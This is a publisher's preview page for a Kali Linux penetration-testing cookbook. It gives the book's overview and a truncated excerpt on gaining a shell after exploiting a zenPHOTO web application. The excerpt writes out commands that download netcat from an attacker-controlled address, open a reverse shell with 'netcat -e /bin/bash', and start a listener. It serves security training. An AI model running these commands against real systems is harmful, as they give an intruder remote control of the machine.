Book Image

Kali Linux - An Ethical Hacker's Cookbook

By : Himanshu Sharma
Book Image

Kali Linux - An Ethical Hacker's Cookbook

By: Himanshu Sharma

Overview of this book

With the current rate of hacking, it is very important to pentest your environment in order to ensure advanced-level security. This book is packed with practical recipes that will quickly get you started with Kali Linux (version 2016.2) according to your needs, and move on to core functionalities. This book will start with the installation and configuration of Kali Linux so that you can perform your tests. You will learn how to plan attack strategies and perform web application exploitation using tools such as Burp, and Jexboss. You will also learn how to perform network exploitation using Metasploit, Sparta, and Wireshark. Next, you will perform wireless and password attacks using tools such as Patator, John the Ripper, and airoscript-ng. Lastly, you will learn how to create an optimum quality pentest report! By the end of this book, you will know how to conduct advanced penetration testing thanks to the book’s crisp and task-oriented recipes.
Table of Contents (20 chapters)
Title Page
Credits
Disclaimer
About the Author
About the Reviewer
www.PacktPub.com
Customer Feedback
Preface
6
Wireless Attacks – Getting Past Aircrack-ng

Spawning a TTY Shell


We have covered different types of privilege escalation. Now let's look at some examples on how to get a TTY shell on this system. A TTY showcases a simple text output environment, that allows us to type commands and get the output.

How to do it...

  1. Let's look at the following example, where we have a web application running zenPHOTO:
  1. The zenPHOTO already has a public exploit running, which we get access to via a limited shell:
  1. Since this is a limited shell, we try to escape it and get a reverse connection by first uploading netcat on the system and then using netcat to gain a backconnect:
      wget x.x.x.x/netcat –o /tmp/netcat
  1. Now we can backconnect using the following command:
      netcat <our IP > -e /bin/bash <port number>
  1. Looking at our Terminal window, where we had our listener setup, we will see a successful connection:
      nc –lnvp <port number>

Let's get a more stable TTY shell; assuming it's a Linux system, we already have Python installed on it...